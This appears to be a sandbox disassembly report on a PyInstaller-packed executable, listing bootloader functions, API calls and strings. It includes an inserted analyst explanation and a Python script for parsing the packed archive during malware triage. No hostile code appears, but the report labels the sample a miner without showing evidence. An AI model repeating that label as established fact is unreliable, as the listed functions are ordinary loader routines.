                                                  • Opcode ID: a3c8e6567a7fd7a5e5e3fd4f052162ecb8691576fce2ca6d2820fff9d11d7845
                                                  • Instruction ID: eba4052748a1d606b6c3e06d902baac880c843c0c8fdd60836f95a4b71ebeb66
                                                  • Opcode Fuzzy Hash: a3c8e6567a7fd7a5e5e3fd4f052162ecb8691576fce2ca6d2820fff9d11d7845
                                                  • Instruction Fuzzy Hash: 50F06871B196958ADBA4EF79A442A3A77D4F748780F808039D68D83B24D63D90508F64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 81c82eb9e1999025efe10c98d3b89d171b57a40d8cb2ac496cbfc14c448416f8
                                                  • Instruction ID: 0a152b48e9e6cd5d4ec0bd57b3c45c82704ad71f9cb96ecd72a85c007800cfc0
                                                  • Opcode Fuzzy Hash: 81c82eb9e1999025efe10c98d3b89d171b57a40d8cb2ac496cbfc14c448416f8
                                                  • Instruction Fuzzy Hash: F7A0022194CC02E9F6A4AF20E8D0830E330FB92B01BC06071D00E420B1AF7DE540D330
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AddressProc
                                                  • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                  • API String ID: 190572456-2208601799
                                                  • Opcode ID: 54a1c3e252e67cc09266da1fcf279fad4bf4e331cc46ad4e59887307f45e8b9e
                                                  • Instruction ID: 364a580e1d126c2b107c8a3cfec76e34b6e0d614a8eb40a24b173871a4e085ea
                                                  • Opcode Fuzzy Hash: 54a1c3e252e67cc09266da1fcf279fad4bf4e331cc46ad4e59887307f45e8b9e
                                                  • Instruction Fuzzy Hash: 0CE1B764A49F03A4EE79EB35E8D0974A7AAEF46B94BC55035D80D063B4FF7CA5488330
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message_fread_nolock
                                                  • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                  • API String ID: 3065259568-2316137593
                                                  • Opcode ID: 0732d4f022fdc7b31db21be6e5e496bbcf735fc263b6977c6db525ed3c6819a5
                                                  • Instruction ID: 031ee249d27fb274957e473acb151257f8f9913a50bbe55911c628899df2d102
                                                  • Opcode Fuzzy Hash: 0732d4f022fdc7b31db21be6e5e496bbcf735fc263b6977c6db525ed3c6819a5
                                                  • Instruction Fuzzy Hash: 0C519161B0868745EA30B731A8D1AFAA394EFA5784FC04431EE4D47BA6FE7CE5458330
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                  • String ID: P%
                                                  • API String ID: 2147705588-2959514604
                                                  • Opcode ID: 1397bf4d49756997acb3fe1c6f5b4c017e2c7a9ff894d6d872dd8574e3b9b785
                                                  • Instruction ID: cc9a86e2af50a310ecf8c64fd9bf2d627800ac31d31a97163ac5cc56799f5e64
                                                  • Opcode Fuzzy Hash: 1397bf4d49756997acb3fe1c6f5b4c017e2c7a9ff894d6d872dd8574e3b9b785
                                                  • Instruction Fuzzy Hash: FD51E826614BA186D634AF36A0585BAF7A1FB98F61F404125EFCE43664DF3CD085DB30
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Message
                                                  • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                  • API String ID: 2030045667-3659356012
                                                  • Opcode ID: 2a5e912accda7a64c0510487fb720770bbefb5a6dcc6c5f22fe97e2fa0bec6cc
                                                  • Instruction ID: 4f58908494786d8af6c64bd67ea767d5d553df630d1428faab027a7ba9aa9ba2
                                                  • Opcode Fuzzy Hash: 2a5e912accda7a64c0510487fb720770bbefb5a6dcc6c5f22fe97e2fa0bec6cc
                                                  • Instruction Fuzzy Hash: 9F314221B1C64346EA34BB71A4809BAE3A1EF65BD4FD84431DE4D07A66FE3CE5458730
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA4864F
                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA4869F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide
                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                  • API String ID: 626452242-27947307
                                                  • Opcode ID: 95a316808b8bb9dcda1ce44e410c088c12bf9ca55186ed30222aaf70ba7edd4d
                                                  • Instruction ID: d63f38bad34aceea8a512159cc2c3e6fd77b7bff8bbb1a02cb8027f4f5339ae5
                                                  • Opcode Fuzzy Hash: 95a316808b8bb9dcda1ce44e410c088c12bf9ca55186ed30222aaf70ba7edd4d
                                                  • Instruction Fuzzy Hash: 6C418232609B8292D670EF25B88097AF6A4FB857E4F944135EE8D47BA4EF3CD055C720
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA48B31
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • WideCharToMultiByte.KERNEL32(?,00007FF79EA439BA), ref: 00007FF79EA48BA5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                  • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                  • API String ID: 3723044601-27947307
                                                  • Opcode ID: b315cce301d6f62c5f2e1af17c77687b806c080175cc497de97e679929b4bd6d
                                                  • Instruction ID: 7697d1fad17428491fb3402ee695ac7a4df5f844fe6a6c8920125dff26e5ac85
                                                  • Opcode Fuzzy Hash: b315cce301d6f62c5f2e1af17c77687b806c080175cc497de97e679929b4bd6d
                                                  • Instruction Fuzzy Hash: E1218071A09B42A9EB60AF36A880879B665FF84BE4F944535DA4D437A5EF3CE5018330
                                                  APIs
                                                  • _fread_nolock.LIBCMT ref: 00007FF79EA47616
                                                    • Part of subcall function 00007FF79EA4E6F0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4E725
                                                    • Part of subcall function 00007FF79EA4DF3C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4DF50
                                                    • Part of subcall function 00007FF79EA4DF10: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79EA4DF24
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                  • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                  • API String ID: 3231891352-3501660386
                                                  • Opcode ID: edf98be7d230375ec646dfab2f7f9e294e049b0c81e2e89eadb090b533645402
                                                  • Instruction ID: f38109528c1a8c2bd748fa6da70b26b64b8cd029bedecc1d38c0a1a0d887d882
                                                  • Opcode Fuzzy Hash: edf98be7d230375ec646dfab2f7f9e294e049b0c81e2e89eadb090b533645402
                                                  • Instruction Fuzzy Hash: AF515B21A1D68345FA34BB359590AB9E292DF85B94FC40131F90D8A7F6FE2CE9058770
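The strings carried by the records above (PYINSTALLER_STRICT_UNPACK_MODE, the "LOADER: ... runtime-tmpdir" messages, win32_utils_to_utf8, the "Failed to extract %s" archive-read errors, and the GetProcAddress table of Tcl_*/Tk_* symbols used by the optional splash screen) belong to the PyInstaller bootloader, and the LoadLibraryExW/"api-ms-" record is the statically linked MSVC CRT's API-set loader helper. None of these functions is the miner's own logic: the Python payload sits in the CArchive appended to the PE as overlay data, and the bootloader only unpacks it into the runtime temp directory and runs it. Triage of such a sample therefore starts with the archive at rest rather than with these stub functions. The script below is an added example and is not code from this report, from Joe Sandbox or from PyInstaller itself: it locates the archive cookie, walks the table of contents and inflates one entry, following the big-endian cookie and TOC layout of the bootloader's pyi_archive.c. It runs on a constructed sample built inline; the MZ stub, the entry names, the python311.dll name and the trailing bytes are stand-ins, not data taken from mav17final.exe.

```python
"""Locate and parse the PyInstaller CArchive appended to a packed PE.

Added example, not code from the report or from PyInstaller; the layout follows
the bootloader's cookie and TOC structures (all integers big-endian).
"""
import struct
import zlib

MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"          # cookie magic, 8 bytes
COOKIE_FMT = "!8sIIII64s"                   # magic, package len, TOC offset, TOC len, python version, pylib name
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"                       # entry len, data offset, compressed len, uncompressed len, flag, type code
ENTRY_HDR = struct.calcsize(ENTRY_FMT)      # 18 bytes, followed by the NUL-padded entry name

SAMPLE_SCRIPT = b"import os\nprint('payload entry point')\n"   # constructed payload for build_sample()


def find_cookie(data: bytes) -> int:
    """Offset of the cookie. Take the LAST match: the pattern can also occur earlier
    in the file (the bootloader compares against it) and bytes such as a signature
    may follow the archive."""
    pos = data.rfind(MAGIC)
    if pos < 0 or pos + COOKIE_SIZE > len(data):
        raise ValueError("no PyInstaller cookie found")
    return pos


def parse_archive(data: bytes) -> dict:
    """Return python version, pylib name, package start offset and the TOC entries."""
    cookie_pos = find_cookie(data)
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, cookie_pos)
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len      # the package length counts the cookie itself
    toc_start, toc_end = pkg_start + toc_off, pkg_start + toc_off + toc_len
    if pkg_start < 0 or toc_end > cookie_pos:
        raise ValueError("cookie describes a package that does not fit the file")
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)   # 311 -> 3.11, 37 -> 3.7
    entries, off = [], toc_start
    while off < toc_end:
        entry_len, pos, clen, ulen, cflag, typcd = struct.unpack_from(ENTRY_FMT, data, off)
        if entry_len < ENTRY_HDR or off + entry_len > toc_end:
            raise ValueError("corrupt TOC entry")
        name = data[off + ENTRY_HDR:off + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "pos": pos, "clen": clen, "ulen": ulen,
                        "compressed": bool(cflag), "typcd": typcd.decode()})
        off += entry_len
    return {"python": f"{major}.{minor}", "pylib": pylib.rstrip(b"\0").decode(),
            "pkg_start": pkg_start, "entries": entries}


def extract_entry(data: bytes, info: dict, entry: dict) -> bytes:
    """Return one entry's payload, inflating it when the TOC flags it as zlib-compressed."""
    start = info["pkg_start"] + entry["pos"]
    blob = data[start:start + entry["clen"]]
    out = zlib.decompress(blob) if entry["compressed"] else blob
    if len(out) != entry["ulen"]:
        raise ValueError(f"size mismatch for {entry['name']}")
    return out


def _toc_entry(pos: int, clen: int, ulen: int, compressed: bool, typcd: str, name: str) -> bytes:
    """Serialize one TOC entry the way PyInstaller does (name NUL-terminated, 16-byte padded)."""
    nm = name.encode() + b"\0"
    if (ENTRY_HDR + len(nm)) % 16:
        nm += b"\0" * (16 - (ENTRY_HDR + len(nm)) % 16)
    return struct.pack(ENTRY_FMT, ENTRY_HDR + len(nm), pos, clen, ulen, int(compressed), typcd.encode()) + nm


def build_sample() -> bytes:
    """Constructed stand-in for a packed PE: dummy MZ stub (with a decoy copy of the magic),
    a compressed script entry, a raw DLL entry, the TOC, the cookie and trailing bytes."""
    stub = b"MZ" + b"\0" * 126 + MAGIC + b"\0" * 8
    script_c = zlib.compress(SAMPLE_SCRIPT)
    dll = b"MZ" + b"\x90" * 30                           # constructed, not a real DLL
    blobs = script_c + dll
    toc = (_toc_entry(0, len(script_c), len(SAMPLE_SCRIPT), True, "s", "main")
           + _toc_entry(len(script_c), len(dll), len(dll), False, "b", "python311.dll"))
    pkg_len = len(blobs) + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(blobs), len(toc), 311, b"python311.dll")
    return stub + blobs + toc + cookie + b"<trailing signature placeholder>"


if __name__ == "__main__":
    sample = build_sample()
    info = parse_archive(sample)
    print(f"python {info['python']} ({info['pylib']}), package at 0x{info['pkg_start']:x}")
    for e in info["entries"]:
        print(f"  {e['typcd']} {e['name']:<16} pos=0x{e['pos']:x} clen={e['clen']} "
              f"ulen={e['ulen']} compressed={e['compressed']}")
    print(extract_entry(sample, info, info["entries"][0]).decode())
```

To run it against the submitted or dropped binary, read the file bytes and pass them to parse_archive. Entries typed 'z' (the PYZ-*.pyz archive) hold the bundled modules in a nested, separately compressed format that this example does not parse, and the last occurrence of the magic is used on purpose because the bootloader can contain the pattern itself and an Authenticode signature may be appended after the archive.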
                                                  APIs
                                                    • Part of subcall function 00007FF79EA489E0: MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                  • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF79EA478A1,00000000,?,00000000,00000000,?,00007FF79EA4154F), ref: 00007FF79EA4737F
                                                    • Part of subcall function 00007FF79EA42B30: MessageBoxW.USER32 ref: 00007FF79EA42C01
                                                  Strings
                                                  • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF79EA47356
                                                  • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF79EA47393
                                                  • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF79EA473DA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                  • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                  • API String ID: 1662231829-3498232454
                                                  • Opcode ID: 0497e94e9ccf1a5fcaefba275e41431edb5a0a8d683527cd1b0ae4e2e1f8841f
                                                  • Instruction ID: 1f44e614d258935ef7210279a6bdb01db9752bc60917e1ada39bb941023ecec8
                                                  • Opcode Fuzzy Hash: 0497e94e9ccf1a5fcaefba275e41431edb5a0a8d683527cd1b0ae4e2e1f8841f
                                                  • Instruction Fuzzy Hash: FB317351B19B8291FA70B731A9D5BBAD251EF98780FC44431DE4E427B6FE2CE5048730
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DA79
                                                  • GetLastError.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DA87
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DAB1
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DAF7
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF79EA4DCA6,?,?,?,00007FF79EA4D9A0,?,?,?,?,00007FF79EA4D6BD), ref: 00007FF79EA4DB03
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                  • String ID: api-ms-
                                                  • API String ID: 2559590344-2084034818
                                                  • Opcode ID: e5bb3e0ff291abc656a6d02375c50d9a2203cec5dca119044776a3d77a5dec4f
                                                  • Instruction ID: 6e264cb343e5c36b68e966c99309783a9045e6f4456c4584c6f948481d1c0921
                                                  • Opcode Fuzzy Hash: e5bb3e0ff291abc656a6d02375c50d9a2203cec5dca119044776a3d77a5dec4f
                                                  • Instruction Fuzzy Hash: 5431A531B1EA4295EE32BB22A480A75A3D4FF45BA4F994535DD1D07361EF3CE4458330
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48A1A
                                                    • Part of subcall function 00007FF79EA429E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF79EA486F3,?,?,?,?,?,?,?,?,?,?,?,00007FF79EA4101D), ref: 00007FF79EA42A14
                                                    • Part of subcall function 00007FF79EA429E0: MessageBoxW.USER32 ref: 00007FF79EA42AEC
                                                  • MultiByteToWideChar.KERNEL32 ref: 00007FF79EA48AA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                  • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLastMessage
                                                  • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                  • API String ID: 3723044601-876015163
                                                  • Opcode ID: a676459dfb3979a77974598a44516e19cf720c6d098cc686ef5965a87a87c41d
                                                  • Instruction ID: ded927312df3a17ab9e5e3d293dbdc3069457e8f97b54b822044d2d830383f15
                                                  • Opcode Fuzzy Hash: a676459dfb3979a77974598a44516e19cf720c6d098cc686ef5965a87a87c41d
                                                  • Instruction Fuzzy Hash: 3A214422B08A4291EB60EB35F880579E7A1FF95BD4B984531DA4C53BB9EF2CD5418730
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2075091332.00007FF79EA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79EA40000, based on PE: true
                                                   • Associated: 00000000.00000002.2075048017.00007FF79EA40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075126515.00007FF79EA66000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA79000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075184051.00007FF79EA7B000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.2075249733.00007FF79EA7D000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff79ea40000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                  • String ID: CONOUT$
                                                  • API String ID: 3230265001-3130406586
                                                  • Opcode ID: 3a368fc3de0a3251161d515db59c2712d7bca6ac77a04358f46d14fcb5505a4c
                                                  • Instruction ID: 1f3ddd59b0c268aff9622446eaeaf41c5fa1aab673e0ec2cebc75fa330c3d768
                                                  • Opcode Fuzzy Hash: 3a368fc3de0a3251161d515db59c2712d7bca6ac77a04358f46d14fcb5505a4c
